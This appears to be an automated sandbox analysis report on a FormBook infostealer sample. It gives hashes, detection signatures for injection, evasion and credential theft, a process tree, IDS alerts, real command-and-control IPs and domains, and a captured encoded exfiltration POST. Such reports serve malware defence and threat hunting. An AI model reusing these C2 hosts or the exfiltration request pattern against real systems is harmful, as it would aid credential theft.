Windows Analysis Report
SDBARVe3d3.exe

Overview

General Information

Sample name: SDBARVe3d3.exe (renamed because original name is a hash value)
Original sample name: 15f617e02521dc3ca65cdc5442d2e5d079a4bbf70d64b465b903d28fcda44103.exe
Analysis ID: 1551048
MD5: b6e0fb667376ccebddaf47c6d4432472
SHA1: f596c7e6c1bf8af55b744ef512fdbaa44c75b876
SHA256: 15f617e02521dc3ca65cdc5442d2e5d079a4bbf70d64b465b903d28fcda44103
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SDBARVe3d3.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\SDBARVe3d3.exe" MD5: B6E0FB667376CCEBDDAF47C6D4432472)
    • SDBARVe3d3.exe (PID: 7692 cmdline: "C:\Users\user\Desktop\SDBARVe3d3.exe" MD5: B6E0FB667376CCEBDDAF47C6D4432472)
      • wPGxKDFwovcH.exe (PID: 5084 cmdline: "C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • fc.exe (PID: 8100 cmdline: "C:\Windows\SysWOW64\fc.exe" MD5: 4D5F86B337D0D099E18B14F1428AAEFF)
          • wPGxKDFwovcH.exe (PID: 4480 cmdline: "C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2916 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.4134715840.0000000002D70000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2059073406.0000000003CB0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.4136828393.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.SDBARVe3d3.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.SDBARVe3d3.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-07T12:52:20.161258+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.4 | 49735 | TCP
2024-11-07T12:52:59.013477+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.4 | 49741 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-07T12:52:59.455958+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 85.159.66.93 | 80 | TCP
2024-11-07T12:53:23.159013+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49856 | 91.184.0.200 | 80 | TCP
2024-11-07T12:53:36.833853+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49933 | 194.9.94.85 | 80 | TCP
2024-11-07T12:53:50.577710+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50010 | 170.39.213.43 | 80 | TCP
2024-11-07T12:54:04.125673+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50023 | 13.248.169.48 | 80 | TCP
2024-11-07T12:54:18.690356+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50027 | 38.47.232.194 | 80 | TCP
2024-11-07T12:54:32.265623+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50031 | 167.172.133.32 | 80 | TCP
2024-11-07T12:54:45.843997+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50035 | 162.0.211.143 | 80 | TCP
2024-11-07T12:55:07.834225+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50039 | 162.241.85.94 | 80 | TCP
2024-11-07T12:55:21.250769+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50043 | 3.33.130.190 | 80 | TCP
2024-11-07T12:55:34.666154+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50047 | 3.33.130.190 | 80 | TCP
2024-11-07T12:55:48.345102+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50051 | 188.114.97.3 | 80 | TCP
2024-11-07T12:56:01.747068+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50055 | 3.33.130.190 | 80 | TCP

                AV Detection

Source: SDBARVe3d3.exe; Avira: detected
Source: SDBARVe3d3.exe; ReversingLabs: Detection: 65%
Source: Yara match; File source: 2.2.SDBARVe3d3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.SDBARVe3d3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000002.4134715840.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2059073406.0000000003CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.4136828393.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.4134941283.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4134736580.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2051531686.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: SDBARVe3d3.exe; Joe Sandbox ML: detected
Source: SDBARVe3d3.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SDBARVe3d3.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: fc.pdb source: SDBARVe3d3.exe, 00000002.00000002.2050351362.0000000001147000.00000004.00000020.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000006.00000002.4134145425.00000000013C8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: fc.pdbGCTL source: SDBARVe3d3.exe, 00000002.00000002.2050351362.0000000001147000.00000004.00000020.00020000.00000000.sdmp, wPGxKDFwovcH.exe, 00000006.00000002.4134145425.00000000013C8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wPGxKDFwovcH.exe, 00000006.00000000.1972969938.000000000080E000.00000002.00000001.01000000.0000000C.sdmp, wPGxKDFwovcH.exe, 00000008.00000002.4133718040.000000000080E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: SPJ.pdbSHA2568 source: SDBARVe3d3.exe
                Source: Binary string: wntdll.pdbUGP source: SDBARVe3d3.exe, 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2059512565.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2057269655.0000000002DEF000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SDBARVe3d3.exe, SDBARVe3d3.exe, 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000007.00000003.2059512565.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000007.00000003.2057269655.0000000002DEF000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: SPJ.pdb source: SDBARVe3d3.exe
Source: C:\Windows\SysWOW64\fc.exe; Code function: 7_2_02A1C500 FindFirstFileW,FindNextFileW,FindClose,7_2_02A1C500
Source: C:\Windows\SysWOW64\fc.exe; Code function: 4x nop then xor eax, eax 7_2_02A09D00
Source: C:\Windows\SysWOW64\fc.exe; Code function: 4x nop then mov ebx, 00000004h 7_2_030904DE

                Networking

Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49742 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49856 -> 91.184.0.200:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49933 -> 194.9.94.85:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50010 -> 170.39.213.43:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50027 -> 38.47.232.194:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50023 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50043 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50031 -> 167.172.133.32:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50055 -> 3.33.130.190:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50035 -> 162.0.211.143:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50039 -> 162.241.85.94:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50051 -> 188.114.97.3:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50047 -> 3.33.130.190:80
Source: DNS query: www.tesetturhanzade.xyz
Source: Joe Sandbox View; IP Address: 13.248.169.48
Source: Joe Sandbox View; IP Address: 91.184.0.200
Source: Joe Sandbox View; ASN Name: AMAZON-02US
Source: Joe Sandbox View; ASN Name: HOSTNETNL
Source: Joe Sandbox View; ASN Name: LOOPIASE
Source: Joe Sandbox View; ASN Name: DIGITALOCEAN-ASNUS
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49741
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49735
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownHTTP traffic detected: POST /ggvc/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.kantinestoel.onlineOrigin: http://www.kantinestoel.onlineCache-Control: no-cacheConnection: closeContent-Length: 205Content-Type: application/x-www-form-urlencodedReferer: http://www.kantinestoel.online/ggvc/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like GeckoData Raw: 4e 42 66 64 43 52 79 48 3d 78 4c 4d 48 6d 37 38 6c 69 52 30 4b 72 79 6e 69 78 4c 6d 32 72 58 55 50 4b 58 63 34 54 5a 47 54 70 67 69 65 46 46 33 4d 56 2f 57 56 37 4e 51 71 73 69 6a 58 68 49 37 38 54 39 41 6d 43 65 4b 68 31 43 5a 34 56 64 58 4a 31 58 75 77 45 56 6b 75 6e 39 57 76 7a 35 36 78 51 38 6f 4c 41 4e 56 68 45 42 44 4e 77 62 54 57 47 53 30 59 52 5a 76 53 65 71 54 44 56 53 79 50 53 59 6f 47 39 78 4e 6e 62 43 4b 7a 57 6e 64 5a 42 46 49 48 52 62 63 43 6e 2b 54 76 74 54 77 2b 79 47 53 78 48 65 72 71 30 70 41 43 65 6d 55 75 52 62 6d 7a 46 62 31 49 4f 68 4c 41 75 68 49 59 42 31 79 41 4c 32 78 67 58 77 3d 3d Data Ascii: NBfdCRyH=xLMHm78liR0KrynixLm2rXUPKXc4TZGTpgieFF3MV/WV7NQqsijXhI78T9AmCeKh1CZ4VdXJ1XuwEVkun9Wvz56xQ8oLANVhEBDNwbTWGS0YRZvSeqTDVSyPSYoG9xNnbCKzWndZBFIHRbcCn+TvtTw+yGSxHerq0pACemUuRbmzFb1IOhLAuhIYB1yAL2xgXw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 07 Nov 2024 11:52:59 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-11-07T11:53:04.2662658Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 11:53:15 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 11:53:17 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 11:53:20 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 11:53:22 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 11:54:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 11:54:13 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 11:54:15 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 11:54:18 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Thu, 07 Nov 2024 11:54:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 66 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 bd 97 f5 cc 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFfzJaC0
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 07 Nov 2024 11:54:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 07 Nov 2024 11:54:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 07 Nov 2024 11:54:32 GMT Content-Type: text/html Content-Length: 153 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 11:54:37 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 11:54:43 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 11:54:45 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 11:55:00 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://papampalli.shop/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 15115 Content-Type: text/html; charset=UTF-8
